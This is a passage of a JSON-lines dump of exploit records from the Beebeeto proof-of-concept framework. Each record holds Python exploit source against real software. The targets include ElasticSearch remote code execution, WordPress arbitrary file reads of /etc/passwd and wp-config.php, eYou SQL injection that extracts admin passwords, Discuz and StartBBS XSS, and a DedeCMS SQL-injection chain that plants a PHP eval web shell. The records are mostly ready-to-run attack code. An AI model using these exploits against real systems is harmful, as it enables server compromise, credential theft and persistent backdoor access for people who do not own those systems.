"poc-2014-0029", "layer4_protocol": null}
{"create_date": "2014-09-25 13:24:31", "name": "ElasticSearch \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "e3rp4y", "rank": 5, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "ElasticSearch,remote code execution,java", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\ntry:\r\n import simplejson as json\r\nexcept ImportError:\r\n import json\r\nimport socket\r\nfrom baseframe import BaseFrame\r\nfrom utils.http import ForgeHeaders\r\n\r\nsocket.setdefaulttimeout(5)\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0028', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'ElasticSearch \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': 'e3rp4y', # \u4f5c\u8005\r\n 'create_date': '2014-09-25', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [9200], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'ElasticSearch', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['<=1.2'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'Code Execution', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['ElasticSearch', 'remote code execution', 'java'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'ElasticSearch \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e.', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': [\r\n 'http://www.ipuman.com/pm6/137/',\r\n 'http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3120',\r\n 'http://www.freebuf.com/tools/38025.html' # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def _emit(cls, args, exp):\r\n data = {\r\n 'size': 1,\r\n 'query': {\r\n 'filtered': {\r\n 'query': {\r\n 'match_all': {}\r\n }\r\n }\r\n },\r\n 'script_fields': {\r\n 'task': { # you can call the task any name, such as 'biubiubiu' etc.\r\n 'script': exp\r\n }\r\n }\r\n }\r\n payload = json.dumps(data)\r\n headers = ForgeHeaders().get_headers()\r\n headers['Content-Type'] = 'application/json; charset=utf-8'\r\n headers['Accept'] = 'ext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'\r\n url = args['options']['target'] + '/_search?source'\r\n req = urllib2.Request(url, data=payload, headers=headers)\r\n resp = urllib2.urlopen(req)\r\n if resp.getcode() != 200 or \\\r\n 'application/json' not in resp.headers.get('content-type'):\r\n return None\r\n else:\r\n ret = json.loads(resp.read())\r\n return ret['hits']['hits'][0]['fields']['task'][0]\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n rs = cls._emit(args, 'Integer.toHexString(65535)')\r\n if rs == 'ffff':\r\n url = args['options']['target'] + '/_search?source'\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = url\r\n if args['options']['verbose']:\r\n print '[*] {} is vulnerable'.format(args['options']['target'])\r\n else:\r\n if args['options']['verbose']:\r\n print '[*] {} is not vulnerable'.format(args['options']['target'])\r\n args['success'] = False\r\n\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "ElasticSearch \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e.", "app_name": "ElasticSearch", "id": "poc-2014-0028", "layer4_protocol": null}
{"create_date": "2014-09-24 19:54:25", "name": "SVN information disclosure POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "Eth0n", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "information disclosure,svn", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0024',\r\n 'name': 'SVN information disclosure POC',\r\n 'author': 'Eth0n',\r\n 'create_date': '2014-09-24',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'All site svn configuration wrong',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['information disclosure', 'svn'],\r\n 'desc': 'use svn incorrect cause site information disclosure',\r\n 'references': ['http://drops.wooyun.org/tips/352',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n keyword = ['file','dir']\r\n vul_url = args[\"options\"][\"target\"] + '/.svn/entries'\r\n if args['options']['verbose']:\r\n print \"[*] Request URL:\", vul_url\r\n resquest = urllib2.Request(vul_url)\r\n response = urllib2.urlopen(resquest)\r\n if response.getcode() != 200:\r\n args[\"success\"] = False\r\n return args\r\n content = response.read()\r\n flag = False\r\n for word in keyword:\r\n if word in content:\r\n flag = True\r\n break\r\n if flag == True:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = vul_url\r\n return args\r\n else:\r\n args[\"success\"] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "use svn incorrect cause site information disclosure", "app_name": "SVN", "id": "poc-2014-0024", "layer4_protocol": null}
{"create_date": "2014-09-23 23:48:11", "name": "WordPress Acento Theme Arbitrary File Download POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "flsf", "rank": 2, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "WordPress,/wp-content/themes/acento/includes/view-pdf.php,Arbitrary File Download", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0022',\r\n 'name': 'WordPress Acento Theme Arbitrary File Download POC',\r\n 'author': 'flsf',\r\n 'create_date': '2014-09-23',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress',\r\n 'vul_version': [''],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['WordPress', '/wp-content/themes/acento/includes/view-pdf.php', 'Arbitrary File Download'],\r\n 'desc': 'wp\u4e3b\u9898\u63d2\u4ef6acento theme \u4e2dview-pad.php \u6587\u4ef6,\u53ef\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6',\r\n 'references': ['http://www.exploit-db.com/exploits/34578/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + \"/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/etc/passwd\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n if 'root:' in content and 'nobody:' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "wp\u4e3b\u9898\u63d2\u4ef6acento theme \u4e2dview-pad.php \u6587\u4ef6,\u53ef\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6", "app_name": "WordPress", "id": "poc-2014-0022", "layer4_protocol": null}
{"create_date": "2014-09-23 17:13:43", "name": "eYou v5 /em/controller/action/help.class.php SQL Injection POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "root", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "eYou,sql injection", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport math\r\nimport time\r\nimport urllib2\r\nimport urllib\r\nimport hashlib, base64\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0021',# \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'eYou v5 /em/controller/action/help.class.php SQL Injection POC', # \u540d\u79f0\r\n 'author': 'root', # \u4f5c\u8005\r\n 'create_date': '2014-09-23', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'eYou', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['v5'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'SQL injection', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['eYou!', 'sql injection'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'eYou v5 has sql injection in /.', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-058014', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload_v = '\") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5(360213360213),NULL#'\r\n attack_url = args['options']['target'] + '/user/?q=help&type=search&page=1&kw='\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + attack_url + payload_v\r\n request = urllib2.Request(attack_url, payload_v)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n res= '5d975967029ada386ba2980a04b7720e'\r\n if res in content:\r\n args['success'] = True\r\n args['poc_ret']['key'] = res\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n payload = '\") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,(SELECT CONCAT(0x2d2d2d,IFNULL' \\\r\n '(CAST(admin_id AS CHAR),0x20),0x2d2d2d,IFNULL(CAST(admin_pass AS CHAR),0x20' \\\r\n '),0x2d2d2d) FROM filter.admininfo LIMIT 0,1),NULL#'\r\n match_data = re.compile('did=---(.*)---([\\w\\d]{32,32})---')\r\n attack_url = args['options']['target'] + '/user/?q=help&type=search&page=1&kw='\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + attack_url+ payload\r\n request = urllib2.Request(attack_url, payload)\r\n response = urllib2.urlopen(request).read()\r\n data = match_data.findall(response)\r\n if data:\r\n args['success'] = True\r\n args['poc_ret']['username'] = data[0][0]\r\n args['poc_ret']['password'] = data[0][1]\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "eYou v5 has sql injection in /.", "app_name": "eYou", "id": "poc-2014-0021", "layer4_protocol": null}
{"create_date": "2014-09-22 21:45:41", "name": "WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "xidianlz", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "WordPress,force-download.php,Arbitrary File Download", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n#coding:utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0017',\r\n 'name': 'WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability POC',\r\n 'author': 'xidianlz',\r\n 'create_date': '2014-09-22',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress',\r\n 'vul_version': ['1.1'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['WordPress', 'force-download.php', 'Arbitrary File Download'],\r\n 'desc': 'WordPress shortcode \u63d2\u4ef61.1\u7248\u672c\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e',\r\n 'references': ['http://sebug.net/vuldb/ssvid-87214',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = \"/wp/wp-content/force-download.php?file=../wp-config.php\"\r\n vul_url = args[\"options\"][\"target\"] + payload\r\n if args['options']['verbose']:\r\n print \"[*] Request URL:\", vul_url\r\n resp = urllib2.urlopen(vul_url)\r\n content = resp.read()\r\n if (\"DB_PASSWORD\" in content ) and (\"DB_USER\" in content):\r\n args[\"success\"] = True\r\n args[\"poc_ret\"][\"vul_url\"] = vul_url\r\n return args\r\n else:\r\n args[\"success\"] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "WordPress shortcode \u63d2\u4ef61.1\u7248\u672c\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e", "app_name": "WordPress", "id": "poc-2014-0017", "layer4_protocol": null}
{"create_date": "2014-09-22 21:06:47", "name": "StartBBS /swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "hang333", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "StartBBS,Flash,XSS", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\" \r\nSite: http://www.beebeeto.com/ \r\nFramework: https://github.com/n0tr00t/Beebeeto-framework \r\n\"\"\" \r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0016',# \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'StartBBS /swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': 'hang333', # \u4f5c\u8005\r\n 'create_date': '2014-09-22', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'StartBBS', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['1.1.15.*'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'XSS', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['StartBBS', 'flash', 'xss'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'StartBBS 1.1.15.* /plugins/kindeditor/plugins/multiimage/images/swfupload.swf Flash XSS', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-049457/trace/bbf81ebe07bcc6021c3438868ae51051', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n } \r\n\r\n @classmethod \r\n def verify(cls, args): \r\n flash_md5 = \"3a1c6cc728dddc258091a601f28a9c12\" \r\n file_path = \"/plugins/kindeditor/plugins/multiimage/images/swfupload.swf\" \r\n verify_url = args['options']['target'] + file_path \r\n xss_poc = '?movieName=\"]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//'\r\n if args['options']['verbose']: \r\n print '[*] Request URL: ' + verify_url \r\n request = urllib2.Request(verify_url) \r\n response = urllib2.urlopen(request) \r\n content = response.read() \r\n md5_value = md5.new(content).hexdigest() \r\n if md5_value in flash_md5: \r\n args['success'] = True \r\n args['poc_ret']['xss_url'] = verify_url + xss_poc\r\n return args \r\n else: \r\n args['success'] = False \r\n return args \r\n \r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "StartBBS 1.1.15.* /plugins/kindeditor/plugins/multiimage/images/swfupload.swf Flash XSS", "app_name": "Startbbs", "id": "poc-2014-0016", "layer4_protocol": null}
{"create_date": "2014-09-22 17:44:47", "name": "Dedecms 5.7 /download.php \u6ce8\u5165GETSHELL\u6f0f\u6d1e EXP", "level": "\u9ad8\u5371", "batchable": 1, "author": "HoerWing", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "dedecms,download.php&ad_js.php,SQL Inject,GETSHELL", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python \r\n# coding=utf-8 \r\n\r\n\"\"\" \r\nSite: http://www.beebeeto.com/ \r\nFramework: https://github.com/n0tr00t/Beebeeto-framework \r\n\"\"\"\r\n\r\nimport urllib2 \r\n \r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame): \r\n poc_info = { \r\n # poc\u76f8\u5173\u4fe1\u606f \r\n 'poc': { \r\n 'id': 'poc-2014-0015', \r\n 'name': 'dedecms 5.7 /download.php \u6ce8\u5165GETSHELL\u6f0f\u6d1e EXP', \r\n 'author': 'HoerWing', \r\n 'create_date': '2014-09-22', \r\n }, \r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f \r\n 'protocol': { \r\n 'name': 'http', \r\n 'port': [80], \r\n 'layer4_protocol': ['tcp'], \r\n }, \r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f \r\n 'vul': { \r\n 'app_name': 'dedecms', \r\n 'vul_version': ['5.7'], \r\n 'type': 'SQL Inject', \r\n 'tag': ['dedecms', 'download.php & ad_js.php', 'SQL Inject', 'GETSHELL'], \r\n 'desc': 'ExecuteNoneQuery2\u6267\u884cSql\u4f46\u662f\u6ca1\u6709\u8fdb\u884c\u9632\u6ce8\u5165\u5bfc\u81f4download.php\u6709sql\u6ce8\u5165\uff0c\u8fdb\u4e00\u6b65\u5bfc\u81f4\u5168\u5c40\u53d8\u91cf$GLOBALS\u53ef\u4ee5\u88ab\u4efb\u610f\u4fee\u6539', \r\n 'references': ['http://yxmhero1989.blog.163.com/blog/static/1121579562013581535738/', \r\n ], \r\n }, \r\n } \r\n \r\n @classmethod \r\n def exploit(cls, args): \r\n payload1 = \"/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=109&arrs2[]=111&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35\" \r\n payload2 = \"/plus/ad_js.php?aid=19\"\r\n shell = \"/plus/moon.php\"\r\n keyword = \"mOon\"\r\n vul_url1 = args['options']['target'] + payload1 \r\n vul_url2 = args['options']['target'] + payload2\r\n shell_url = args['options']['target'] + shell\r\n if args['options']['verbose']: \r\n print '[*] Request URL: ' + vul_url1\r\n print '[*] Request URL: ' + vul_url2\r\n request1 = urllib2.urlopen(vul_url1)\r\n request2 = urllib2.urlopen(vul_url2)\r\n resp = urllib2.urlopen(shell_url) \r\n content = resp.read() \r\n if keyword in content: \r\n args['success'] = True \r\n args['poc_ret']['vul_url'] = vul_url2\r\n args['poc_ret']['shell'] = shell_url\r\n args['poc_ret']['password'] = 'x'\r\n return args \r\n else: \r\n args['success'] = False \r\n return args \r\n \r\n verify = exploit \r\n \r\nif __name__ == '__main__': \r\n from pprint import pprint \r\n \r\n mp = MyPoc() \r\n pprint(mp.run()) ", "desc": "ExecuteNoneQuery2\u6267\u884cSql\u4f46\u662f\u6ca1\u6709\u8fdb\u884c\u9632\u6ce8\u5165\u5bfc\u81f4download.php\u6709sql\u6ce8\u5165\uff0c\u8fdb\u4e00\u6b65\u5bfc\u81f4\u5168\u5c40\u53d8\u91cf$GLOBALS\u53ef\u4ee5\u88ab\u4efb\u610f\u4fee\u6539", "app_name": "DedeCms", "id": "poc-2014-0015", "layer4_protocol": null}
{"create_date": "2014-09-19 16:42:43", "name": "Discuz 7.2 /post.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "XSS,Discuz,post.php,Discuz7.2\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0009',\r\n 'name': 'Discuz 7.2 /post.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2014-09-19',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['7.2'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Discuz!', 'post.php', 'Cross Site Scripting', 'XSS'],\r\n 'desc': 'post.php\u4e2dhandlekey\u53d8\u91cf\u4f20\u5165global.func.php\u540e\u8fc7\u6ee4\u4e0d\u4e25,\u5bfc\u81f4\u53cd\u5c04XSS\u6f0f\u6d1e\u7684\u4ea7\u751f',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-065930',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = \"/post.php?action=reply&fid=17&tid=1591&extra=&replysubmit=yes&infloat=yes&handlekey=,alert(/5294c4024a6f892da8a6af5abd1b3c36/)\"\r\n keyword = \"5294c4024a6f892da8a6af5abd1b3c36\"\r\n vul_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + vul_url\r\n print '[*] FileMD5 : ' + keyword\r\n request = urllib2.Request(vul_url)\r\n resp = urllib2.urlopen(request)\r\n content = resp.read()\r\n key = \"if(typeof messagehandle_,alert(/\"+keyword+\"/)\"\r\n if key in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = vul_url\r\n args['poc_ret']['payload'] = payload\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "post.php\u4e2dhandlekey\u53d8\u91cf\u4f20\u5165global.func.php\u540e\u8fc7\u6ee4\u4e0d\u4e25,\u5bfc\u81f4\u53cd\u5c04XSS\u6f0f\u6d1e\u7684\u4ea7\u751f", "app_name": "Discuz", "id": "poc-2014-0009", "layer4_protocol": null}
